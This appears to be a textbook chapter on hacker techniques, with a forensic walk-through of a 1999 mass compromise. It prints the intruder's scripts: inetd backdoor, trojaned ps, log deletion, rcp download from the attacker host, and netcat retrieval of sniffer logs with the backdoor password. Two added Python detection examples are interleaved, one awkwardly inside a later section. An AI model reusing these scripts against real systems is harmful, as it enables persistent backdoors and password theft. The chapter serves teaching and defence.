Chapter 13: Hacker Techniques

METHODS OF THE UNTARGETED HACKER

Untargeted hackers are individuals who are not looking for access to particular information or organizations but instead are looking for any system that they can compromise. The skill level of such individuals varies from completely unskilled to very skilled. The motivation of untargeted hackers appears to be primarily the challenge of gaining access to systems. There may be some greed motivation among these hackers, but what they are trying to acquire by their actions remains a mystery.

Targets

Untargeted hackers look for any system they can find. There are not normally any pre-identified targets. Occasionally, a network or domain name may be chosen to search for targets, but these choices are considered to be random.

Reconnaissance

Reconnaissance for the untargeted hacker can take many forms. Some perform no reconnaissance whatsoever and just begin the attack without even determining if the systems that are being attacked are actually on the network. When reconnaissance is performed, it is usually done from systems that the hacker already has compromised so that the trail does not lead directly back to the hacker.

Most often, the untargeted hacker will perform a stealth scan (also called an IP half scan) against a range of addresses to identify which systems are up. A stealth scan is an attempt to identify systems within an address range. It may also identify the services being offered by the identified system, depending on how the scan is performed. The stealth scan may be used in conjunction with a ping sweep of the address range. A ping sweep is simply an attempt to ping each address and see if a response is received. When a hacker performs a stealth scan, he sends a normal TCP SYN packet to the address and waits for the TCP SYN ACK response. If a response is received, the hacker sends a TCP RST packet to close the connection before it actually completes (see Figure 13-7).
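The SYN / SYN-ACK / RST exchange just described is also what a defender can look for in a packet capture: a source that repeatedly aborts handshakes right after the SYN-ACK arrives. The detector below is an added example, not code from the book; the packet records are constructed, and the three-host threshold is an assumed tuning value.

```python
"""Find half-open (SYN / SYN-ACK / RST) stealth-scan probes in a packet list.
Added example, not from the book; the records below are constructed and a real
deployment would read them from a capture or flow export instead."""
from collections import defaultdict

# Constructed packet records: (source IP, destination IP, TCP port, TCP flags).
# Flags use the usual letters: S = SYN, A = ACK, R = RST.
PACKETS = [
    # Scanner 10.0.0.9 half-opens three hosts and never completes a handshake.
    ("10.0.0.9", "192.0.2.10", 22, "S"), ("192.0.2.10", "10.0.0.9", 22, "SA"),
    ("10.0.0.9", "192.0.2.10", 22, "R"),
    ("10.0.0.9", "192.0.2.11", 80, "S"), ("192.0.2.11", "10.0.0.9", 80, "SA"),
    ("10.0.0.9", "192.0.2.11", 80, "R"),
    ("10.0.0.9", "192.0.2.12", 22, "S"), ("192.0.2.12", "10.0.0.9", 22, "SA"),
    ("10.0.0.9", "192.0.2.12", 22, "R"),
    # A closed port answers SYN with RST/ACK; that is not a half-open probe.
    ("10.0.0.9", "192.0.2.13", 25, "S"), ("192.0.2.13", "10.0.0.9", 25, "RA"),
    # Ordinary client 10.0.0.5 completes a normal three-way handshake.
    ("10.0.0.5", "192.0.2.10", 80, "S"), ("192.0.2.10", "10.0.0.5", 80, "SA"),
    ("10.0.0.5", "192.0.2.10", 80, "A"),
]

def half_open_probes(packets):
    """Return {client: {server: set(ports)}} for flows in which the client
    answered the server's SYN-ACK with RST instead of ACK: each such port was
    confirmed open to the client without the handshake ever completing."""
    state = {}  # (client, server, port) -> handshake stage
    probes = defaultdict(lambda: defaultdict(set))
    for src, dst, port, flags in packets:
        if flags == "S":  # client opens: remember the attempt
            state[(src, dst, port)] = "syn"
        elif flags == "SA" and state.get((dst, src, port)) == "syn":
            state[(dst, src, port)] = "synack"  # server offers the service
        elif "R" in flags and state.get((src, dst, port)) == "synack":
            probes[src][dst].add(port)  # client aborted: half-open probe
            del state[(src, dst, port)]
        elif "R" in flags and state.get((dst, src, port)) == "syn":
            del state[(dst, src, port)]  # server refused: closed port
        elif flags == "A" and state.get((src, dst, port)) == "synack":
            state[(src, dst, port)] = "open"  # legitimate connection
    return probes

def stealth_scanners(packets, min_hosts=3):
    """List (scanner, hosts probed, ports seen open) for sources that half-opened
    connections to at least min_hosts distinct hosts, most hosts first."""
    hits = []
    for client, servers in half_open_probes(packets).items():
        if len(servers) >= min_hosts:
            ports = sorted({p for ps in servers.values() for p in ps})
            hits.append((client, len(servers), ports))
    return sorted(hits, key=lambda h: -h[1])

if __name__ == "__main__":
    for scanner, hosts, ports in stealth_scanners(PACKETS):
        print(f"{scanner}: half-open probes to {hosts} hosts, open ports {ports}")
```

The report also lists which ports answered SYN-ACK, which is exactly the service information the scanner walked away with.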
In many cases, this prevents evidence of the attempt from entering the target’s logs. Variations of this type of scan include reset scans, where the hacker will send a TCP RST packet to the address. Normally, the reset packet will have no effect on the target system and no response from the target will be made. However, if the system does not exist, the router on the network where the target address would reside will respond with an ICMP Host Unreachable message. This message indicates that the system does not exist (see Figure 13-8). There are other variations on this concept that achieve similar results. It should be noted that while the reset scan can identify systems that exist on the network, it does not identify what services are running on the system as a stealth scan can.

Figure 13-7. Stealth scanning
Figure 13-8. Reset scans

In a limited number of cases, an untargeted hacker will perform the reconnaissance in several steps. First, the hacker may choose (usually at random) a domain name and attempt to perform a zone transfer of DNS against this domain. A zone transfer lists all of the systems and IP addresses that DNS knows about in the domain. Taking this list, the hacker may then run a tool such as Queso or Nmap to identify the operating system of the potential targets. A stealth scan may be used to identify the services on the targets, and the final list may be used for the actual attacks.

Reconnaissance is not limited to Internet addresses. Wardialing, another method that is used by hackers to identify potential victims, identifies systems that have modems and that answer incoming calls. A hacker will use a computer to dial a large number of phone numbers looking for a modem carrier. Thousands of phone numbers can be called during a single night. The more modern tools can differentiate between modems and fax machines.
Once the modems are identified, a hacker may return to each in turn to see what program is answering. Tools such as PC Anywhere receive more attention since they allow a hacker to take control of the answering computer.

Attack Methods

Generally, the untargeted hacker will have a single exploit or a small group of exploits available. Using the reconnaissance methods identified above, the hacker will look for systems that may be vulnerable to the available exploits. When the systems are found, the exploits are used. Most untargeted hackers will identify individual systems and attempt the exploit on one system at a time. More sophisticated hackers will use the reconnaissance tools to identify many vulnerable systems and then write scripts that allow them to exploit all of these systems in a short amount of time.

Use of Compromised Systems

Once a system is compromised, hackers normally place back doors on the system so that they can access it again later. Some hackers will close the vulnerabilities that they used to gain initial access to the system so that no other hacker can gain control of “their system.” Hackers may copy the system’s password file back to some other system so that the passwords can be cracked. They will usually also load a password sniffer to capture passwords for other systems. Once compromised, a system may be used to attack other systems or for reconnaissance probes.

As an example of how a compromised system may be used, I will discuss a real-world situation. On or about June 30, 1999, a large number of systems were attacked and successfully penetrated across the Internet. The attack appeared to have been automated since the systems all were compromised within a very short period of time. Following an investigation and examination of some of the compromised systems, it was concluded that the attacker used an RPC Tooltalk buffer overflow to gain entry to the systems.
Once the systems were compromised, the attacker ran a script on each system that did three things:

▼ It closed the vulnerability that allowed entry into the system.
■ It loaded a back door in inetd to allow the attacker to return to the system.
▲ It started a password sniffer on the system.

After further investigation, the investigation team came into possession of scripts that appeared to be from the attacker’s own system. We verified that the scripts did in fact work on a compromised system. These scripts provided an automated means for the attacker to return to each compromised system and retrieve the sniffer logs. The sniffer logs would include user IDs and passwords from other systems on the local network. The next section provides the gory details of each script that we found so you can see how the attacker built his empire.

Actual Attack Scripts

The scripts that are discussed below were found on compromised systems, and they show how a hacker could use a large number of compromised systems to gather other passwords. The files bd (a script), doc (a binary replacement for inetd), update (a password sniffer), and ps (a binary replacement for the ps command) were found in a file called neet.tar.

We begin the examination of the intruder’s methods with the victim system. The system in question is thought to have been compromised through a buffer overflow in the Solaris RPC Tooltalk program. On the system we found a script called bd that was used to load the system.

    unset HISTFILE; unset SAVEHIST

The hacker turns off the history file so that his actions will not be recorded there.

    cp doc /usr/sbin/inetd; chown root /usr/sbin/inetd; chgrp root /usr/sbin/inetd;
    touch 0716000097 /usr/sbin/inetd;

The hacker copies doc over the existing inetd binary, then changes the ownership, group, and time stamp of the file to match the original.
    rm -rf doc /tmp/bob /var/adm/messages /usr/lib/nfs/statd /usr/openwin/bin/rpc.ttdb* /usr/dt/bin/rpc.ttdb*

The hacker removes the file doc that had been extracted from neet.tar, /tmp/bob (we will discuss this more later), messages (to remove information about the attack), statd, and rpc.ttdb (the Tooltalk binary). It is interesting that the hacker removes the method used to gain access to the system.

    rm -rf /var/log/messages /var/adm/sec* /var/adm/mail* /var/log/mail* /var/adm/sec*

The hacker removes additional logs to hide his actions.

    /usr/sbin/inetd -s; /usr/sbin/inetd -s; telnet localhost; /usr/sbin/inetd -s;

The hacker starts two copies of inetd. He then tries to telnet to the localhost and starts a third copy of inetd.

    ps -ef | grep inetd | grep bob | awk '{print "kill -9 " $2 }' > boo
    chmod 700 boo
    ./boo

The hacker locates the original version of inetd by looking for inetd and bob in the process table. He then creates a file called boo with the contents “kill -9 {inetd process id}”, changes the file permissions so the file can be executed, and executes it. This removes the original inetd process.

    ps -ef | grep nfs | grep statd | awk '{print "kill -9 " $2 }' > boo
    chmod 700 boo
    ./boo
    ps -ef | grep ttdb | grep -v grep | awk '{print "kill -9 " $2 }' > boo
    chmod 700 boo
    ./boo
    rm -rf boo

The hacker then locates the statd and ttdb processes and removes them in the same manner.

    mkdir /usr/man/tmp
    mv update ps /usr/man/tmp
    cd /usr/man/tmp
    echo 1 \"./update -s -o output\" > /kernel/pssys
    chmod 755 ps update
    ./update -s -o output &

The hacker creates a directory under /usr/man and places the sniffer and the ps files there. He creates a startup script to restart the sniffer on system start and starts the sniffer.

    cp ps /usr/ucb/ps
    mv ps /usr/bin/ps
    touch 0716000097 /usr/bin/ps /usr/ucb/ps

The hacker replaces the real ps with the new ps and changes its time stamp to correspond to the original.
    cd /
    ps -ef | grep bob | grep -v grep
    ps -ef | grep stat | grep -v grep
    ps -ef | grep update

The hacker checks to make sure that all is running appropriately.

The bd script is of great interest. Not only does it tell what was changed on the systems, but it also gives a few clues as to how the hacker got into the system. The key item here is the reference to /tmp/bob. By examining how the hacker removed the original inetd process, we can surmise that inetd was running with a configuration file called /tmp/bob (inetd can be caused to run with a configuration file specified on the command line). We still do not know what was in /tmp/bob, but we must assume that the original exploit of Tooltalk allowed the hacker to restart inetd with a new configuration file. Another point of interest in the script is the fact that the hacker killed the processes that got him into the system initially. Here we might assume that the hacker did not wish others to attack one of his boxes. The one mistake in the script was the starting of three inetd processes. This caused two things to occur: multiple inetd processes were visible, and messages appeared in /var/log/messages indicating that the second and third inetd processes could not bind to the telnet or ftp ports.

Once the initial exploit compromised the systems, the hacker used scripts to load each system with sniffers and back doors. These scripts were run from the attacking system. To load the victim systems, the hacker created three scripts. The first script is called massbd.sh.

    #!/bin/sh
    for i in `cat $1`; do (./bd.sh $i &);done

This script takes an input file (assumed to be a list of IP addresses) and executes the bd.sh script (different than the bd script discussed above) against each one. The bd.sh script is a simple two-line script.
    #!/bin/sh
    ./bdpipe.sh | telnet $1 1524

The bd.sh script on the hacker’s machine provides some valuable information as to what the initial buffer overflow exploit did to the system. This script takes the command-line argument and pipes the commands from a third script, bdpipe.sh, into telnet. Note the destination port: 1524. This script provides more of the evidence as to what the initial exploit did to the target system.

The third script is bdpipe.sh. This set of commands is piped through telnet and actually executed on the target system.

    #!/bin/sh
    echo "cd /tmp;"
    echo "rcp demos@xxx.yyy.zzz.aaa:neet.tar ./;"
    sleep 2
    echo "tar -xvf neet.tar;"
    sleep 1
    echo "./bd;"
    sleep 10
    echo "rm -rf neet.tar bd update*;"
    sleep 10
    echo "exit;"

The bdpipe.sh script remote copies the neet.tar file from some other system, opens the file, and executes the bd script that we found on the victim systems. After the bd script executes on the victim, this script is supposed to remove neet.tar, bd, and update from /tmp. This did not work on all of the exploited systems, thus allowing us to find the neet.tar file and its contents.

From these three scripts, it is obvious that the hacker had intended this attack to compromise a large number of systems in a short period of time. While the scripts are not difficult to construct, a fair amount of work went into building all of the pieces so that the attack could be extremely widespread.

From the information that we were able to gather, it appears that the hacker was not done after loading the sniffer on all of the victims. We found three other scripts that were intended to retrieve the sniffed passwords. The first script is called mget.sh.

    for i in `cat $1` ; do (./sniff.sh $i &) ; done

The mget.sh script takes a list of IP addresses and uses them to call sniff.sh. The sniff.sh script is a two-line script.
    #!/bin/sh
    ./getsniff.sh | ./nc -p 53982 $1 23 >> $1.log

Sniff.sh takes the IP address and uses it to make a connection to the target system on port 23 (telnet) but from a specific source port (53982). The program nc (called netcat) allows the hacker to make connections to any port from any port. Finding this script told us what the back door was in the replacement inetd. If a connection were made to telnet from port 53982, the replacement inetd would look for a password and, if provided, give a root shell.

The third script is called getsniff.sh. This script is piped through the nc connection and executed on the target system.

    #!/bin/sh
    sleep 2
    echo "oir##t"
    sleep 1
    echo "cd /usr"
    sleep 1
    echo "cd man"
    echo "cd tmp"
    sleep 2
    echo "cat output*"
    sleep 1
    echo "exit"

Getsniff.sh provided us with the password to be used with the replacement inetd (oir##t). This script would provide the input to nc to finish the connection to the target system and then retrieve the output file from the sniffer.

Putting all of these scripts together gives a good picture of what the hacker was doing. Once a target system was compromised, he could remotely retrieve the sniffer logs and thus compromise many other systems that were not penetrated during the first attack. The automation of this compromise and retrieval process would allow the hacker to gain access to an extremely large number of systems very quickly and then to broaden the scope of his success by retrieving and storing additional passwords.

METHODS OF THE TARGETED HACKER

A targeted hacker is attempting to successfully penetrate or damage a particular organization. Hackers who target a specific organization are motivated by a desire for something that organization has (usually information of some type). In some cases, the hacker is choosing to do damage to a particular organization for some perceived wrong. Many of the targeted DoS attacks occur in this way.
The skill level of targeted hackers tends to be higher than that for untargeted hackers.

Targets

The target of the attack is chosen for a reason. Perhaps the target has information that is of interest to the hacker. Perhaps the target is of interest to a third party who has hired the hacker to get some information. Whatever the reason, the target is the organization, not necessarily just one system within the organization.

Reconnaissance

Reconnaissance for a targeted attack takes several forms: address reconnaissance, phone number reconnaissance, system reconnaissance, business reconnaissance, and physical reconnaissance.

Address Reconnaissance

Address reconnaissance is simply the identification of the address space in use by the target organization. This information can be found from a number of locations. First, DNS can be used to identify the address of the organization’s Web server. DNS will also provide the address of the primary DNS server for the domain and the mail server addresses for the organization. Taking the addresses to the American Registry of Internet Numbers (ARIN) (http://www.arin.net) will show what addresses belong to the organization. Name searches can also be conducted through ARIN to find other address blocks assigned to the target organization. Additional domain names that may be assigned to the organization can be found by doing text searches at Network Solutions (http://www.networksolutions.com). For each additional domain that is found, DNS can be used to identify additional Web servers, mail servers, and address ranges. All of this information can be found without alerting the target.
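Returning to the bd script examined under Actual Attack Scripts: the host-side traces it leaves (an inetd started with /tmp/bob on its command line, three inetd processes, the update sniffer, and bind failures in /var/log/messages) can be checked with a short audit. This is an added example, not the book’s or the investigation team’s code; the ps and syslog lines are constructed, and the exact bind-failure wording is an assumption.

```python
"""Audit a process list and syslog for the traces the bd script leaves behind:
extra inetd copies, an inetd started with a config file on its command line,
the 'update' sniffer, and inetd bind failures. Added example, not the book's
code; the sample data is constructed and the syslog wording is assumed."""
import re

# Constructed `ps -ef` output (UID PID PPID C STIME TTY TIME CMD).
PS_LINES = [
    "    root   138     1  0 09:14:02 ?        0:00 /usr/sbin/inetd -s /tmp/bob",
    "    root   901     1  0 11:20:17 ?        0:00 /usr/sbin/inetd -s",
    "    root   903     1  0 11:20:17 ?        0:00 /usr/sbin/inetd -s",
    "    root   910   907  0 11:20:19 ?        0:01 ./update -s -o output",
    "    root   112     1  0 09:13:55 ?        0:00 /usr/lib/nfs/statd",
]

# Constructed /var/log/messages lines; the bind-failure text is illustrative.
LOG_LINES = [
    "Jun 30 11:20:17 victim inetd[901]: telnet/tcp: bind: Address already in use",
    "Jun 30 11:20:17 victim inetd[903]: ftp/tcp: bind: Address already in use",
    "Jun 30 11:25:40 victim sendmail[950]: queue run started",
]

# UID PID PPID C STIME TTY TIME, then the command with its arguments.
PS_RE = re.compile(r"^\s*(\S+)\s+(\d+)\s+(\d+)\s+\d+\s+\S+\s+\S+\s+\S+\s+(.*)$")

def check_processes(ps_lines):
    """Return findings derived from ps -ef output."""
    findings, inetd_pids = [], []
    for line in ps_lines:
        m = PS_RE.match(line)
        if not m:
            continue
        pid, cmd = m.group(2), m.group(4)
        if re.search(r"(^|/)inetd\b", cmd):
            inetd_pids.append(pid)
            # inetd normally reads /etc/inetd.conf; a path argument is suspect.
            cfg = re.search(r"\s(/\S+)$", cmd)
            if cfg:
                findings.append(f"inetd pid {pid} uses config file {cfg.group(1)}")
        if re.search(r"(^|/)update\s+-s\s+-o\s+output\b", cmd):
            findings.append(f"pid {pid} runs the sniffer: {cmd}")
    if len(inetd_pids) > 1:
        findings.append(f"{len(inetd_pids)} inetd processes (pids {', '.join(inetd_pids)})")
    return findings

def check_syslog(log_lines):
    """Return inetd bind failures, the side effect of starting inetd repeatedly."""
    return [l for l in log_lines if re.search(r"inetd\[\d+\]:.*\bbind\b", l)]

def audit(ps_lines, log_lines):
    """Combine process and log findings into one list."""
    return check_processes(ps_lines) + check_syslog(log_lines)
```

Because bd replaces the ps binary, run the process listing from known-good media rather than trusting the on-disk /usr/bin/ps.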